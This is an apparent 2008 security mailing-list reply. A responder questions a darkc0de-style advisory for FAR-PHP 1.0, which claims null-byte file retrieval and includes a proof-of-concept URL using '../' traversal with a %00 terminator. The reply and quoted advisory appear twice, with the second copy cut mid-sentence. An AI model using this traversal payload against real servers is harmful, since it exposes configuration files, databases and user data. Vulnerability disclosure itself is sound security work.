I'm sorry, but your screenshot actually leads me to not have much more
confidence. I noticed your titlebar is modified, so that tells me the
script is most likely modified in some way. Provide us with a pure
script, please. Also, on an unrelated note, why are you running
professional? Why did you blank out the bottom half of the window?
What are you hiding?
On Wed, 2008-08-20 at 20:56 -0600, beenudel1986 (at) gmail (dot) com [email concealed] wrote:
> ################################################################
> # .___ __ _______ .___ #
> # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
> # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
> # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
> # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
> # \/ \/ \/ #
> # ___________ ______ _ __ #
> # _/ ___\_ __ \_/ __ \ \/ \/ / #
> # \ \___| | \/\ ___/\ / #
> # \___ >__| \___ >\/\_/ #
> # est.2007 \/ \/ forum.darkc0de.com #
>
> ################################################################
>
> # Web Application: FAR - PHP Project version:1.0
> # Vendor's Address :www.far-php.ro
> ################################################################
>
>
> ################################################################
> Author: Beenu Arora
> Address: www.beenuarora.com
> ################################################################
>
>
> #Python Dark Scripts: www.beenuarora.com/work.html
>
> ################################################################
> #Date Found: 21/08/08
> #Severity: High
> #Security Risk:Null Byte Files Retrieval
> #Explaination:It is possible to view the contents of any file (e.g. databases, user information or configuration files) on the web server (under the permission restrictions of the web server user)
>
>
> #POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
> #For the POC pic visit: www.beenuarora.com/POC.bmp
>
> ################################################################
> ________________________________________________________________________
______________
> |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team memebers. |
> |_______________________________________________________________________
______________|
confidence. I noticed your titlebar is modified, so that tells me the
script is most likely modified in some way. Provide us with a pure
script, please. Also, on an unrelated note, why are you running
professional? Why did you blank out the bottom half of the window?
What are you hiding?
On Wed, 2008-08-20 at 20:56 -0600, beenudel1986 (at) gmail (dot) com [email concealed] wrote:
> ################################################################
> # .___ __ _______ .___ #
> # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
> # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
> # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
> # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
> # \/ \/ \/ #
> # ___________ ______ _ __ #
> # _/ ___\_ __ \_/ __ \ \/ \/ / #
> # \ \___| | \/\ ___/\ / #
> # \___ >__| \___ >\/\_/ #
> # est.2007 \/ \/ forum.darkc0de.com #
>
> ################################################################
>
> # Web Application: FAR - PHP Project version:1.0
> # Vendor's Address :www.far-php.ro
> ################################################################
>
>
> ################################################################
> Author: Beenu Arora
> Address: www.beenuarora.com
> ################################################################
>
>
> #Python Dark Scripts: www.beenuarora.com/work.html
>
> ################################################################
> #Date Found: 21/08/08
> #Severity: High
> #Security Risk:Null Byte Files Retrieval
> #Explaination:It is possible to view the contents of any file (e.g. databases, user information or configuration files) on the web server (under the permission restrictions of the web server user)
>
>
> #POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
> #For the POC pic visit: www.beenuarora.com/POC.bmp
>
> ################################################################
> ________________________________________________________________________
______________
> |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team memebers. |
> |_______________________________________________________________________
______________|
[ reply ]